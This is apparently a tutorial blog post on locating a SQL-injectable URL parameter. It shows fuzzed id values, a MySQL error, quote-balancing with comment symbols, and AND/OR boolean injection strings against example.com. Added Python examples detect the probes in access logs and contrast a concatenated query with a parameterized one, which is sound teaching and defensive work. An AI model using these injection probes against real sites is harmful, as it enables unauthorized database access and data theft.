Sunday, June 3, 2012

Finding Injection Parameter


Now that we have seen some basic SQL injection to fuzz the admin login panel, we will head towards understanding parameters in a URL.

What is a Parameter?
It is a place where the user inputs something, and that input is then used to build a query and execute it.

Ex: A form on a webpage will have parameters, because it allows the user to input some data, and according to the data entered, some query will be built and executed.

Dynamic links on a webpage: you might have seen tabs on a webpage like GALLERY, NEWS, etc. When you click on one, it connects to a table, like the table 'category', etc.

Let's take an example here:

http://www.example.com/index.php?id=

Ok, so when I have such a URL, the first thing that comes to my mind is that, based on the 'id' value, some sort of page is what I should expect as output.

Now I start playing with it, keeping my eyes open:

http://www.example.com/index.php?id=1

http://www.example.com/index.php?id=2

http://www.example.com/index.php?id=3

Okay, what am I noticing here? The 'id' values are integers, and based on them I get different webpages.

I continue...

http://www.example.com/index.php?id=CK

And I get a blank page with no MySQL errors, so I conclude the id parameter accepts only integers.

I continue...

http://www.example.com/index.php?id=CK1

http://www.example.com/index.php?id=1CK

And I still get a blank page with no MySQL errors, so I conclude it cannot take alphanumeric values.

I continue more...

http://www.example.com/index.php?id=9999999999999999999

And I still get a blank page with no MySQL errors, so I conclude it cannot take long integers.

So what is it that I am trying to do? Nothing much; it's known as analysing the workflow, or understanding the 2nd layer engine that connects to the database.

Typically I am trying to break the normal functionality, i.e. fuzzing it.

I continue...

http://www.example.com/index.php?id=1'

And voilà, I broke it: I got a MySQL error

(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1)

So here is what I understand now:
The parameter is 'id'
If the datatype is int: no SQL error
If the datatype is string: no SQL error
If the datatype is long: no SQL error
If the datatype is alphanumeric: no SQL error
If the datatype is special characters: SQL error
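The probing sequence above leaves a recognisable trail in the web server's access log: one client sending a run of non-integer values for a parameter that only ever takes short integers, then values containing a quote or comment sequence. The following Python script is an added example (not code from the original post) that scans constructed common-log-format lines for exactly that pattern; the log lines, the `id` parameter name, the 10-digit limit and the threshold of three anomalous requests per source are all assumptions made here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the original post): the
# probing sequence the post walks through, as a web server would record it.
# The quote is sent percent-encoded (%27) and "--+" is "--" followed by a space.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jun/2012:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [03/Jun/2012:10:00:02 +0000] "GET /index.php?id=2 HTTP/1.1" 200 4980
203.0.113.5 - - [03/Jun/2012:10:00:03 +0000] "GET /index.php?id=CK HTTP/1.1" 200 312
203.0.113.5 - - [03/Jun/2012:10:00:04 +0000] "GET /index.php?id=1CK HTTP/1.1" 200 312
203.0.113.5 - - [03/Jun/2012:10:00:05 +0000] "GET /index.php?id=9999999999999999999 HTTP/1.1" 200 312
203.0.113.5 - - [03/Jun/2012:10:00:06 +0000] "GET /index.php?id=1%27 HTTP/1.1" 200 640
203.0.113.5 - - [03/Jun/2012:10:00:07 +0000] "GET /index.php?id=1%27%20AND%201=2%20--+ HTTP/1.1" 200 312
198.51.100.7 - - [03/Jun/2012:10:00:08 +0000] "GET /index.php?id=3 HTTP/1.1" 200 5011
"""

# Common-log-format request line: client IP, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The post establishes that a legitimate id is a short integer (assumed here:
# at most 10 digits); anything else is either a probe for the data type or an
# attempt to break out of the quoted SQL string.
INT_RE = re.compile(r"\d{1,10}")
SQL_MARKERS = ("'", '"', "--", "#", "/*", ";")


def classify_id(value):
    """Return 'ok', 'sqli-marker' or 'non-integer' for one raw id value."""
    if INT_RE.fullmatch(value):
        return "ok"
    if any(marker in value for marker in SQL_MARKERS):
        return "sqli-marker"
    return "non-integer"


def scan_log(text, param="id", threshold=3):
    """Flag every request whose id is not a plain integer and list the source
    addresses that sent at least `threshold` such requests."""
    findings = []
    anomalies_per_ip = {}
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        query = urlsplit(match.group("target")).query
        # parse_qs percent-decodes the value and turns '+' into a space
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            verdict = classify_id(raw)
            if verdict == "ok":
                continue
            ip = match.group("ip")
            findings.append({"ip": ip, "value": raw, "verdict": verdict,
                             "status": int(match.group("status"))})
            anomalies_per_ip[ip] = anomalies_per_ip.get(ip, 0) + 1
    suspicious = sorted(ip for ip, n in anomalies_per_ip.items() if n >= threshold)
    return {"findings": findings, "suspicious_ips": suspicious}


if __name__ == "__main__":
    report = scan_log(SAMPLE_LOG)
    for f in report["findings"]:
        print(f"{f['ip']}  {f['verdict']:12}  id={f['value']!r}")
    print("suspicious sources:", report["suspicious_ips"])
```

The classification is deliberately tied to what the application's own parameter means: because a valid `id` is always a short integer, the check does not need a list of attack strings to flag the type probes (`CK`, `1CK`, the 19-digit value), and the marker list only serves to label the quote and comment attempts separately. Note that the blank pages all come back with status 200, so the status code alone would show nothing; the value is what gives the probing away. One practical caveat: a literal `#` typed into a browser's address bar is a URL fragment and is never sent to the server, so it cannot show up in the log at all.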

Now let's try to understand the error we got.

We are not learning grammar or sentence structure here, so I don't care what it says; I am more concerned about the error I got, i.e. ''1'' LIMIT 0,1'

Analysing...

''1'' LIMIT 0,1' >> Every parameter is surrounded by quotes, so let's eliminate the outermost quotes
'1'' LIMIT 0,1
'  1'  ' LIMIT 0,1
'  (User_input_values_here)  ' LIMIT 0,1
With a single quote I unbalanced the quotes, which gave out the error, so my injection is a single quote. Now let's try to balance it out. How? By commenting out: this tells the database that anything after the comment symbol is a comment, so the database ignores it.

Comment symbols are:
1. /*(comments)*/
2. --+(comments)
3. # (comments)

As the prime objective of this post is to find out the injectable parameter and fields, I will stick to it; in the next post I will explain how to exploit it.

Again, I try:

http://www.example.com/index.php?id=1' # >> MySQL Error
http://www.example.com/index.php?id=1' /* >> MySQL Error
http://www.example.com/index.php?id=1' --+ >> No Error

So now I have found out where I can inject SQL queries. Any valid SQL query between (1'  [here]  --+) will be executed as a valid SQL query.

Just As an Example:

http://www.example.com/index.php?id=1' --+ >> No Error, With Valid Output
http://www.example.com/index.php?id=1' AND 1=2 --+ >> No Error, But No Output, because the logic we gave here is 1=2, which is always false
http://www.example.com/index.php?id=1' AND 1=1 --+ >> No Error, With Valid Output
http://www.example.com/index.php?id=1' OR 1=1 --+ >> No Error, With Valid Output
http://www.example.com/index.php?id=1' OR 1=2 --+ >> No Error, With Valid Output (we get the output here because our query has an OR operator: 1 OR 0 = 1, 1 OR 1 = 1, 0 OR 1 = 1, 0 OR 0 = 0)

This is simply the truth table of the 'OR' operator.
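Everything observed above (blank page for `CK`, database error for `1'`, a page again once the quote is balanced with `--`, and the AND/OR results) follows from the statement shape the error message exposed, `... WHERE id='<input>' LIMIT 0,1`, being built by string concatenation. The Python below is an added example, not the post's code or the target application's code: it reproduces that vulnerable lookup against a constructed SQLite table called `pages` (SQLite is used instead of MySQL so it runs anywhere; it accepts the same `--` comment and `LIMIT 0,1` form) and places the hardened version next to it, which enforces the post's own finding that `id` is a short integer and then binds the value as a parameter.

```python
import sqlite3


def make_db():
    # Constructed stand-in for a page/category table (not the post's database).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(1, "Gallery"), (2, "News"), (3, "Contact")])
    return conn


def lookup_vulnerable(conn, user_id):
    # String concatenation: the input becomes part of the SQL text, giving the
    # statement shape the post's error message exposes:
    #   ... WHERE id='<input>' LIMIT 0,1
    sql = "SELECT title FROM pages WHERE id='" + user_id + "' LIMIT 0,1"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(conn, user_id):
    # 1) Enforce what the post observed about the parameter: a valid id is a
    #    short integer (assumed limit here: 10 ASCII digits). Everything else is
    #    rejected before it gets anywhere near the database.
    if not (user_id.isascii() and user_id.isdigit() and len(user_id) <= 10):
        return None
    # 2) Bind the value: the driver sends it as data, never as SQL text, so a
    #    quote or comment sequence inside it can no longer change the statement.
    row = conn.execute("SELECT title FROM pages WHERE id=? LIMIT 0,1",
                       (int(user_id),)).fetchone()
    return row[0] if row else None


def probe(lookup, user_id):
    """Run one lookup on a fresh database and report ('ok', result) or
    ('error', message): 'ok' with a title is the normal page, 'ok' with None is
    the blank page, and 'error' is the database error the post describes."""
    conn = make_db()
    try:
        return ("ok", lookup(conn, user_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ["1", "CK", "1'", "1' AND 1=2 --", "1' OR 1=2 --"]:
        print(f"{value!r:18} vulnerable={probe(lookup_vulnerable, value)}  "
              f"hardened={probe(lookup_hardened, value)}")
```

Running it shows the two behaviours side by side: the vulnerable lookup returns the page for `1`, nothing for `CK`, a syntax error for `1'` (the unbalanced quote), nothing for `1' AND 1=2 --` and the page again for `1' OR 1=2 --`, exactly the pattern the post reads as "found the injection point". The hardened lookup returns the page for `1` and nothing, with no error, for every other value, so the probing sequence above no longer produces a distinguishable signal. Both steps matter: the integer check alone would be bypassed if a later change made the parameter a string, and the bound parameter alone still lets oversized or malformed values reach the database.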

So we see that we have found the place where we can inject our SQL queries.

Hope this was informative and helpful.

Thank You!
